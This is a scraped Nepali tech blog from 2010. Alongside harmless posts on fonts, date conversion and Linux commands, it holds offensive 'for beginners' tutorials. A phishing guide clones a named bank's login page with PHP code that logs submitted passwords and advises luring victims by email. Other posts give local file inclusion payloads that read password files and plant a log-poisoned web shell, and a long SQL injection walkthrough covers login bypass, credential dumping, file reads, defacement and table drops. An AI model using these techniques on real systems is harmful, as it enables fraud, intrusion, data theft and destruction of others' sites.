The second feature is the converter that's capable of converting Bikram sambat(nepali date) to english A.D. and vice-versa.
Bikram Sambat to A.D & Vice-versa Converter

Hope you like these features. Have fun. :)


Download Nepali Fonts [Collection of few Nepali fonts]

If you are looking for some fonts, I've uploaded them for you.

This font pack includes Bharatvani Wide Font, Devanagari New, Himalb, HindiSanskrit, Kanchan, Kantipur, MtEverest, Rukmini, and Sagarmatha. If you need any other fonts and if you can't find through google search, drop the comment here and I will be finding them for you.

Download Nepali Fonts Pack

Hope this helps you. :)


Online Unicode Nepali to Kantipur/Preeti Converter

For some strange reason (or due to my unfamiliarity with Scribus), Scribus didn't show the Unicode Nepali text from story editor to the text frame so I searched for the online tool that would convert nepali unicode to the nepali fonts like kantipur or preeti. On doing the google search, I found an online tool that would do this task and I thought to share this with you guys.

In order to access the service, you can visit HERE.

Edit: The above link has been updated and another page has been referred to us in the comment.

NepalBhasa Converter, suggested in the comment section.

Hope you find this useful. Have fun :)


Wednesday 13 October 2010

Making a fake login page [tutorial on phishers for beginners]

This tutorial will give you basic idea of what phishers are and how to create a simple phisher. Please be sure to comment on this post.

A phisher is a fake login page used to gain access to someones account. When someone logs into
the fake login page, there password is sent to you in some way such as by email or by writing to the files in the webserver. The major attacks of the phishing are the email accounts and e-commerce sites so this method is widely used to steal the critical information from the users.

Now, I'll show you how to make a successful phisher by giving an example by creating the phishing page of e-Banking of Nepal Investment Bank Limited.
a) We open the login page of our target site and save the page in our HDD by going to File->Save As from Firefox.

b) You'll have a HTML page and the folder containing the required images, css and javascript files for the HTML page.

c) Create a file like passes.txt or whatever where you'll store all the passwords from the phishing page. Note that you'll have to chmod this file to writable(like chmod a+w filename or chmod 777 filename according to the permission you want).

d) Now create a PHP file called phisher.php and paste the code below:

$fp = fopen("passes.txt","a");

foreach ($_REQUEST as $var => $val)
    fwrite($fp, $var." = ".$val."\r\n");

e) Your phishing PHP script is ready. Now time for editing the HTML source of your target login page. Open the HTML source in text editor and search for the text <form in my case(&usually) and in the action field specify the name of your PHP script like:

<form action="phisher.php" method="POST" name="RetailSignOn">

f) Now, our phisher is ready and all you have to do is upload the phisher.php and the HTML source and its related folder to free webhosting (I use Be sure to create passes.txt and set proper permission in the webserver.

g) Now, all you have to do is send the link of your phisher to the users by emailing, forum boards, XSS methods or by RTLO spoofing or any other method you can work creatively.

Now, if you want to stop these phishers, you might want to submit the phisher links you find on the internet to

I hope you learn something from this phishing tutorial. Have fun. :)


Comparing two files under LINUX [Basic Linux Command - Part II]

In this post, I am going to introduce you the methods of comparing two files in LINUX and is the second article on the basic linux commands following the previous post.

For comparing two files, we can follow two step task. The first step would be counting the number of lines, words and characters in the two files. After this, we would be interested to check the difference in the lines.

We use wc command to find the newline(giving count for number of lines), word and byte counts for the specified file (or the standard input if any file is not specified.

Let me take an example of the following test.c file on which I will perform wc command.


#include <stdio.h>
int main (int argc, char *argv[])
    return 0;

samar@samar-laptop:~/Desktop$ wc test.c
6 13 88 test.c

So this file contains 6 lines, 13 words and 88 characters (actually bytes).
You can specify the multiple files at once with this command such as:

samar@samar-laptop:~/Desktop$ wc test.c test.cpp
6 13 88 test.c
9 18 112 test.cpp
15 31 200 total

This way, you can calculate and compare the lines, words and characters count between two files. Now, we will look on the way of comparing files line by line and seeing the difference in the line.

The diff command allows us to display the line-by-line difference between two files.

Lets view the content of two files 1.txt and 2.txt, then we will be issuing diff command to see the difference between these files line-by-line.

samar@samar-laptop:~/Desktop$ cat 1.txt
samar dhwoj acharya

samar@samar-laptop:~/Desktop$ cat 2.txt
saurya dhwoj acharya
my brother

samar@samar-laptop:~/Desktop$ diff 1.txt 2.txt
< samar dhwoj acharya
> saurya dhwoj acharya
> my brother

In the output, the lines in first file are identified with less than sign and lines in the second file are identified with greater than sign. This is how you can see the lines where two files differ with each other. Further, we have sdiff command which will allow you to merge the file differences side by side and view the differences easily. I'll let you explore this command on your own. Also, if you want case-independent comparison with diff command, you can use -i parameter.

Also, I would be more than happy if you try to learn other commands such as cmp on your own.

Hope you learn something from this. Have fun and Happy Vijaya Dashami. :)


Tuesday 12 October 2010

Download the Nepali songs from

This might be a minor hack but for some nepali music fans, it can be a great honeypot. I didn't see any option in the webpages to download the nepali mp3 songs available at so had to go with the alternative way when I needed to download tapoban maajha song of Jagadish Samal from this site.

For downloading mp3s from this site, you'll need to install the Downloadhelper firefox addon which I've already discussed in this blog.

Now after you downloaded this addon, go to NepaliCollection Music page and select among the artists available in the artists tab. After selecting the artists, you'll reach to the page with all the songs of that artist.

Now you can select the song you want to download and when you click on play selected option, the Downloadhelper icon will start to animate. Now click on that icon and you will be able to save the MP3 that is currently playing. This site has some really old songs too and the songs that you can't find usually. So its worth trying this trick.

Edit*: The site is vulnerable to SQL injection, maybe I might be writing some PHP script to easily give the download link of any MP3 the user wants to download. Needs some research over the vuln in the site, though.

Have fun with this trick. :)


विजय दशमीको मनगलमय शुभकामना सम्पूर्ण नेपालीलाई [Happy Dashain]

नेपालीहरुको महान पर्ब बिजया दशमीको मंगलमय शुभकामना techgaun को तर्फ बाट। यो महान पर्ब को अवसरमा हजुरहरु सम्पूर्णको जीवनमा खुशीयाली छाओस हाम्रो येही छ कामना.
तपाईंको समय राम्रो सँग बितोस येही छ हाम्रो चाहना

Happy dashain once again. :)


Monday 11 October 2010

Installing .deb package in ubuntu with dpkg

You can use dpkg, a command line tool to manage the packages, in order to install .deb packages in your ubuntu linux distro.

dpkg is a tool to install, build, remove and manage Debian packages. The primary and more user-friendly front-end for dpkg is aptitude. dpkg itself is controlled entirely via command line parameters, which consist of exactly one action and zero or more options. The action-parameter tells dpkg what to do and options control the behavior of the action in some way.

In order to install the .deb package, you need to use -i parameter with the dpkg command as below:

cd /home/samar/Downloads/

sudo dpkg -i skype-ubuntu-intrepid_2.1.0.81-1_amd64.deb

Also, you can install the multiple packages directly by issuing the command as below:

cd /home/samar/Downloads/

sudo dpkg -i *.deb

Hope this helps you. :)


Sunday 10 October 2010

Send Free SMS all over the World with

Searching for the online portal that you can use to send SMS to anyone and anywhere in the world? I found the solution for it. from Venista Group offers a free service to send SMS all over the world. The best part of this service is it allows you to send unlimited number of characters in your SMS.

When you sign up, you'll have to enter the valid phone number where you will be sent the link for completing the registration. After completing the registration, you'll be able to send SMS to whoever and wherever you want.

The only thing that might not be desirable for many is the small ad at the end but the service is worth using.

Go to

Please if you try(or have already tried) the service, please comment on this post so that it will be useful for others.


Saturday 9 October 2010

Online Cool ASCII Generator from Network-Science.De

While googling for the online ascii generator tools, I came across a very useful site with number of fonts and other options to use in order to create cool ASCII of our texts.

__                .__     
_/  |_  ____   ____ |  |__  
\   __\/ __ \_/ ___\|  |  \ 
 |  | \  ___/\  \___|   Y  \
 |__|  \___  >\___  >___|  /
           \/     \/     \/ 
   _________   __ __  ____  
  / ___\__  \ |  |  \/    \ 
 / /_/  > __ \|  |  /   |  \
 \___  (____  /____/|___|  /
/_____/     \/           \/

Online ASCII Generator @ Network-Science.De

I found another website for the same purpose.

Have fun. :)


Get Matrix like Text Effect for Website Headers with

If you want the image with matrix like text effect for your blog or any other site/profile, you can now get it online.

Just type the text you want to appear in the image and choose from the various available options and on one single click, you will get image with the matrix text effect containing text you inputted.

What the official site says:

Matrix Text for websites and myspace. Create the matrix text effect or any text effect using the real matrix text characters. Generate free matrix text for MySpace or any other website and enchance your MySpace matrix layout. Our matrix text maker will provide matrix text HTML for free and it's fun to use. Our matrix text generator codes are used for everything. We take pride in our matrix text graphics! Say Happy Birthday with a Matrix Text! Quickly create personalized matrix text pictures to use anywhere.

Matrix Text Effect for Tech Gaun

Visit the site

They say they give HTML but you can directly save the image. Choose among the animation speed, color, font, etc. and get the Matrix Text effect as you need. Have fun. :)


Searching flash games using Google Search trick

Another google trick, this can be used to search any flash games(swf files) you want to play.

So you just played a flash game which was really cool and you want to download it in your computer? You can use google's search trick to search for any flash game you want.
This trick relies on the way directory listing is done in the webserver's directories. Whenever the default index page or directory listing denying features are not implemented in the web server, we can view the files in the directory. I'm not going into the further detail of this, instead I'm going to show you how to perform the google search for finding whatever flash game you want.

I need the game called gravity which is very fun to play. Now I do the search as below to find it:

"index of /" "last modified" "parent directory" swf gravity

You can replace the gravity with the name of the flash game you want to search and download.

Have fun with this google trick. :)


Searching PDFs and DOCs using Google Search

Generally, we use Google search in order to find any information we need. Google is widely used by many of us to find information relevant for us. Sometimes, we may need to find PDF (Portable Document Format) or DOC files and even the PPT (Powerpoint Presentations). This can be easily done using google search trick.

In order to find any type of file in google, we can use special google keyword filetype to specify the type of file we want to search. Put the colon : after the filetype and specify the type of file you want. For example, if you are searching for PDF or DOCs, do the following:



For example, you are searching for the PDFs related to nepali morphological analyzer, you'll do:

nepali morphological analyzer filetype:pdf

You can follow the same process for any other filetypes. Have fun with this google trick. :)


Thursday 7 October 2010

Local File Inclusion [LFI] tutorial for beginners

Before, I have written an article on remote file inclusion (RFI) and this time, I am writing the article of LFI. So what is LFI? Its similar to RFI except that we are gonna include the file within the server rather than from another server. Sometimes, what happens is, we have allow_url_include setting is set to off on the webserver (On is by default) or there's somekind of filtration to check for things like http:// or www (though we can bypass these things). So in that condition, we may have to use LFI to own the server.

So lets again take example of vulnerable script:

    if (IsSet($_GET['page']))

Here we can see that the script doesn't check for which file to be included and hence, we are free to include any file by changing the 'page' GET variable value.

Lets put a quote at the end of URL and we see a pretty nice error like this:

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2

Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

So the script can't find the file profile.php' and hence errors. Now, lets try to include sensitive files that might be present in the webserver.

    Eg:    //boot.ini file in windoze
        http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts        //hosts info file
        http://localhost/test.php?page=../../../../etc/passwd            //on Linux
        http://localhost/test.php?page=../../windows/repair/sam            //backup sam file
        etc. and etc.

    Two ../ shifts the current directory to two level down like cd../.. in command prompt. You may watch the error to find how many such dots you should use. But if you don't know how many such ../ you should use or don't want to waste time on finding how many steps you require, you may put enough such trails like about 10 to view these files like boot.ini or /etc/passwd as after reaching to the root folder like C:\, they can't go down anymore.

So you now know how to include sensitive files on the webserver. Now what if we need shell on the server.
Now, we throw some error to the logs of webserver that contain PHP code:
    <?php passthru($_GET['cmd']); ?> or something similar to this. There are functions like system(), shell_exec(), exec(), etc. offered by PHP for executing system level commands.

The problem on injecting malicious code to log files is that we either need to inject through telnet or using codes. I have seen many sites with the perl codes for the purpose. Search it.
What we do is inject the code to log files of apache such as access.log or apache_error.log or php_error.log or on any other log file. Then we include the same log file in the vulnerable script and then execute system commands.
    In my wampserver, I have:

        http://localhost/test.php?page=../logs/access.log   //for the log with site access infos.

There are various places you might want to watch and I'll be listing them at the end of tutorial.
Here I am gonna use telnet to throw the PHP code as error to the access.log file.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

Now this is gonna get saved in the file access.log in my webserver and now I include it in the vulnerable script:

    So we do:    http://localhost/test.php?page=../logs/access.log&cmd=dir    //lists the directory
    Now you may do any miserable works by writing cmd=any_system_level_commands like:
        ls -lia
        echo "HaCKeD BY sam207">index.*
        net user sam207 mypass /add
        net localgroup administrator sam207 /add

and any other commands you like.
This describes pretty much on owning the server. Now something extras I thought to include here:
    Some developers think that they can ensure the inclusion of only valid php file by doing something like below:

            if (IsSet($_GET['page']))

        // so looks like that it will include only the php files by ensuring the .php extension at the end. But if we add question mark (?) or nullbyte () by doing http://localhost/test.php?page=access.log, it would become something like:
                include("access.log.php");    //now the scripts leaves anything behind the nullbyte and the file access.log is successfully included. And you can carry your usual pwnage.
        Note that don't try to inject PHP code by sending malicious HTTP requests through your browser. It will be encoded and you won't be able to exploit.

Now finally the places you might want to watch on lfi:
You can find many other places to look after during your lfi by searching on the internet. Be creative and use your brain.
Hope you like it. Please comment it.
With Regards~


Complete MySQL Injection Tutorial for Beginners [SQLi tutorial]

This is the SQL injection tutorial written around two years ago when I was myself learning all sorts of hacking methodologies. I hope the beginners will have benefit from this sql injection tutorial. Enjoy reading this long article.




    #Checking for vulnerability
    #Find the number of columns
    #Addressing vulnerable part
    #Finding MySQL version
    #MySQL 5 or above injection
    #MySQL 4 injection

Greetz to all, I m sam207. In this tutorial, I will demonstrate the infamous MySQL injection in newbie perspective so that all the newbies become able to become successful SQL injector. But, be sure to check various php & mysql functions in various sites which will help you a lot... Also do not be harsh on me if there are any grammatical errors on the tutorial bcoz English is not my native language(I m from Nepal). Now lets begin our walkthrough of SQL injection.

Just general info.. Database is the application that stores a collection of data. Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. DB may hold various critical informations like usernames, passwords, credit cares,etc. So, DB need to be secured but many DB servers running are insecured either bcoz of their vulnerability or bcoz of poor programming handles. To name few DB servers, MySQL(Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite, etc.

SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.
    In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walkthrough..

Suppose, a site has a login form & only the registered users are allowed to enter the site. Now, say u wanted to bypass the login and enter the site as the legitimate user. If the login script is not properly sanitized by the programmer, u may have luck to enter the site. U might be able to login into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
    Let's see an example, where the username admin with the password sam207 can login to the site. Suppose, the SQL query for this is carried out as below:
    SELECT USER from database WHERE username='admin' AND password='sam207'
And if above SELECT command evaluates true, user will be given access to the site otherwise not. Think what we could do if the script is not sanitized. This opens a door for the hackers to gain illegal access to the site.
In this example, the attacker can enter the following user data in the login form:
username:a or 1=1--
So, this would make our query as:
    SELECT USER from database WHERE username='a' or 1=1-- AND password=''
Note that -- is the comment operator and anything after it will be ignored as a comment. There exists another comment operator which is /*.
So our above query becomes:
    SELECT USER from database WHERE username='a' or 1=1
Now this query evaluates true even if there is no user called 'a' bcoz 1=1 is always true and using OR makes the query return true when one of the query is true. And this gives access to the site admin panel.
There can be various other username and password combinations to play with the vulnerable sites. U can create ur own new combinations for the site login.
Few such combinations are:
username:' or 1='1        password:' or 1='1
username:' or '1'='1'    password:' or '1'='1'
username:or 1=1        password:or 1=1
and there are many more cheat sheets. Just google. In fact, you can create your own such combinations to bypass logins..
That's all about bypassing logins.

SQL injection is not essentially done for bypassing logins only but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections.

Sub-section 1:
Checking for vulnerability
Suppose, u got a site:
Now to check if it is vulnerable, u would simply add ' in the end i.e. where id variable is assigned.
So, it is:'
Now if the site is not vulnerable, it filters and the page loads normally.
But, if it doesn't filter the query string, it would give the error something like below:
"MySQL Syntax Error By '5'' In Article.php on line 15."
error that says us to check the correct MySQL version or MySQL Fetch error or sometimes just blank page. The error may be in any form. So it makes us sure that the site is vulnerable.
Also just using ' may not be the sure test; so you may try different things like: union select 1--
If you get error with this, you again come to know that its vulnerable... Just try different things..

Sub-section 2:
Find the number of columns
So, now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get error.
That is, we make our URL query as: order by 1/*
    //this didn't give error.
    Now, I do increase it to 2. order by 2/*
    //still no error
    So, we need to increase until we get the error.
In my example, I got error when I put the value 3 i.e. order by 3/*
    //this gave me error.
So, it means there are 2 columns in the current table(3-1=2). This is how we find the number of columns.

Sub-section 3:
Addressing Vulnerable Part:
Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page.
First lets craft the union statement which won't error.. This becomes like this: UNION ALL SELECT null/*
    This would error because our query needs to have one more null there.. Also null doesnot cause any type conversion error as it is just null..
    So for our injection, it becomes: UNION ALL SELECT null,null/*
For this we do: UNION ALL SELECT 1,2/*
Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere like in the title of the page or sometime even in the hidden tags in the source.. So, this means we can replace the number with our commands to display the private data the DB holds.
    In my example, 1 is seen on the page. This means, I should replace 1 with my thingsto proceed further. Got it??So lets move forward.
 Quick note: Sometime the numbers may not be displayed so it becomes hard for you to find the column which you can use to steal the data.. So in that case, you may try something like below: UNION ALL SELECT sam207,null/*
    or UNION ALL SELECT null,sam207/*

If sam207 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags..

Sub-section 4:
Finding MySQL version:
For our injection, it is necessary to find the MySQL version bcoz if it is 5, our job becomes lot easier. To check the version, there is a function @@version or version().
So, what we do is replace 1(which is the replaceable part) with @@version i.e. we do as below: UNION ALL SELECT @@version,2/*
    or UNION ALL SELECT version(),2/*
So, this would return the version of MySQL running on the server.
But, sometimes u may get error with above query. If that is the case, do use of unhex(hex()) function like this: ALL SELECT unhex(hex(@@version)),2/*
Remember that if u have to use unhex(hex()) function here, u will also have to use this function in the injection process later on.
@@version will give u the version. It may be either 4(or below) or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.

Quick note: Also, you may check for user, database,etc.. by using following: UNION ALL SELECT user(),2/* UNION ALL SELECT database(),2/*

Sub-section 5:
MySQL 5 or above injection:
Here, I m gonna show u how to access data in the server running MySQL 5 or above.
U got MySQL version 5.0.27 standard using the @@version in url parameter. MySQL from version 5 has a useful function called information_schema. This is table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site.
For getting table list, we use: table_name from information_schema.tables
For getting column list, we use: column_name from information_schema.columns
So our query for getting the table list in our example would be: UNION ALL SELECT table_name,2 FROM information_schema.tables/*
And yeah if u had to use unhex(hex()) while finding version, u will have to do: UNION ALL SELECT unhex(hex(table_name)),2 FROM information_schema.tables/*
This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. U can even write down the table names for further reference and works. For my example, I would use the tbluser as the table that contains user & password.
Similarly, to get the column list, we would make our query as: UNION ALL SELECT column_name,2 FROM information_schema.columns/*
This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. So that's the column what I wanted. U have to search and check the columns until u get no error.
Alternatively to find the column in the specific table, u can do something like below: UNION ALL SELECT column_name,2 FROM information_schema.columns WHERE table_name='tbluser'
    This would display the columns present in the table tbluser. But this may not work always.
Let me show u how I got to know that the above two columns belong to table tbluser. Now let me show how to display the username and password stored in the DB.
There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using :(colon) in the hex form. Its hex value is 0x3a(thats zero at beginning not alphabet o.)
What I do is: UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
And this gives me the username and password like below:
Here the password is hashed and in this case, its MD5. Now u need to get the hash cracker like John The Ripper(, Cain & Able( and crack the hash. The hash may be different like SHA1, MD5,etc.. or sometimes plaintext password may be shown on the page. In this case, when I crack I get the password as sam207.
Now u get to admin login page and login as admin. Then u can do whatever u like. So that's all for the MySQL version 5.

Sub-section 6:
MySQL version 4 injection:
Now say ur victim has MySQL version 4. Then u won't be able to get the table name and column name as in MySQL version 5 bcoz it lacks support for information_schema.tables and information_schema.columns. So now u will have to guess the table name and column name until u do not get error. Also, if the mysql version is below 5, you may have to depend on the luck & error messages displayed.. Sometimes the error will give you the table name & column name & that gives you some idea to guess the correct table & columns name.. Say, the error reports sam207_article in the error.. So, you know that sam207_ is the prefix used in the table names...
Anyway, lets go for MySQL version 4 injection...
For example, u would do as below: UNION ALL SELECT 1,2 FROM user/*
Here, I guessed for the table name as user. But this gave me the error bcoz the table with the name user didn't exist on the DB. Now I kept on guessing for the table name until I didn't get error.
When I put the table name as tbluser, the page loaded normally. So I came to know that the table tbluser exists. UNION ALL SELECT 1,2 FROM tbluser/*
The page loaded normally. Now again u have to guess the column names present in the tbluser table.
I do something like below: UNION ALL SELECT user_name,2 FROM tbluser/*
    //this gave me error so there is no column with this name. UNION ALL SELECT username,2 FROM tbluser/*
    //It loaded the page normally along with the username from the table. UNION ALL SELECT pass,2 FROM tbluser/*
    //it errored so again the column pass doesnot exist in the table tbluser. UNION ALL SELECT password,2 FROM tbluser/*
    //the page loaded normally with password hash(or plaintext password).
Now u may do this: UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
This gave me:
On cracking, I got sam207 as password. Now I just need to login the site and do whatever I wanted.
Few table names u may try are: user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc. As said earlier, be sure to look on the errors because sometime they give fortunately for us the errors with table names & column names...

U may try these methods so as to get various data such as credit card numbers, social security numbers, etc. and etc. if the database holds. Just what u need to do is figure out the columns and get them displayed on the vulnerable page. That's all on the injection for accessing secret data.

Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here.
Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed but good news for PHP/MySQL developer, stacked queries are not supported in PHP when using MySQL but can be used with MsSQL server.
First let me list these commands:
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission.
Command Usage:
UPDATE: Our vulnerable page is:
    Lets say the query is:
    SELECT title,data,author FROM article WHERE id=5
Though in reality, we don't know the query as above, we can find the table and column name as discussed earlier.
So we would do: UPDATE article SET title='Hacked By sam207'/*
    or, u could alternatively do: UPDATE article SET title='HACKED BY SAM207',data='Ur site has zero    

By executing first query, we have set the title value as 'Hacked By sam207' in the table article while in second query, we have updated all three fields title, data, & author in the table article.
Sometimes, u may want to change the specific page with id=5. For this u will do: UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
DELETE:As already stated, this deletes the content of one or more fields permanently from the db server.
The syntax is: DELETE title,data,author FROM article/*
    or if u want to delete these fields from the id=5, u will do: DELETE title,data,author FROM article WHERE id=5/*
DROP:This is another deadly command u can use. With this, u can delete a table & all its associated data.
For this, we make our URL as: DROP TABLE article/*
    This would delete table article & all its contents.

Finally, I want to say little about ;
Though I have not used this in my tutorial, u can use it to end ur first query and start another one.
This ; can be kept at the end of our first query so that we can start new query after it.

This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT;
So, you would craft a query which would execute the above command...
For example, in my case, I would do the following: SHUTDOWN WITH NOWAIT;
WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources...

MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc..
Do something like below: UNION ALL SELECT load_file('etc/passwd'),2/*

But sometimes, you will have to hex the part & do something like below: UNION ALL SELECT load_file(0x272F6574632F70617373776427)
    where I have hexed... Now, if we are lucky, the script would echo the etc/passwd in the result..

If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL..
For this, you will do: UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*

Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But has one to do it..

Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer..
All the commands here are copy pasted from the post at & the credit for this part goes to the original author.. This is the only part which I didn't write myself.. I could have but since there is better one, I thought to put the same part here.. Thanks to whoever posted this in h4cky0u site.. & also full credits to him/her for this part..
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database

I know I have missed some things like outfile, WHERE clause, blind injection,etc... If I get time, I would try to update the tutorial with these.. Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you.. UNION ALL SELECT <script>alert("XSS via SQL injection");</script>,2/*
Again in the above injection, you may require to hex up the javascript part for bypassing the magic quotes..
Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things..
In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them.. What would happen if I do this? or that?? etc..etc.. Second, you may be able to find bugs in them.. like rfi in some part of the code or sql injection in another part or maybe csrf injection,etc.. That would help you to learn new things because you all know practice makes the man perfect...

Greetz to all at darkmindz. Load of shoutz to pSyChO mOnkee and sToRm(U two guys rock) and all at GNY. Also greet to t0mmy9(Thanks for always helping me learn things) at
And hi to all my classmates bigyan musa, bhakunde sameer, gainda sandeep, joe haatti, dipesh bhedo, eman bhainsi, milan biralo, nikesh gandeula(Pheretima posthuma) & all my other classmates. Widout u guys, I m having boring days in my biology class. Hope to meet u all guys. And I wish bright future of u guys. Become successful doctors, engineers or whatever you wish to be..

THE END: With this, my tutorial which was mainly intended for newbies, ends here. I hope u liked my tutorial. I will hopefully write new tutorials in newbie concept after I learn myself all these things. Any comments can be dropped at samar_acharya[at]
And finally, read more and more, ask more and more and thats the best way to learn the things.
Keep Hacking & Enjoy It.

30 August, 2008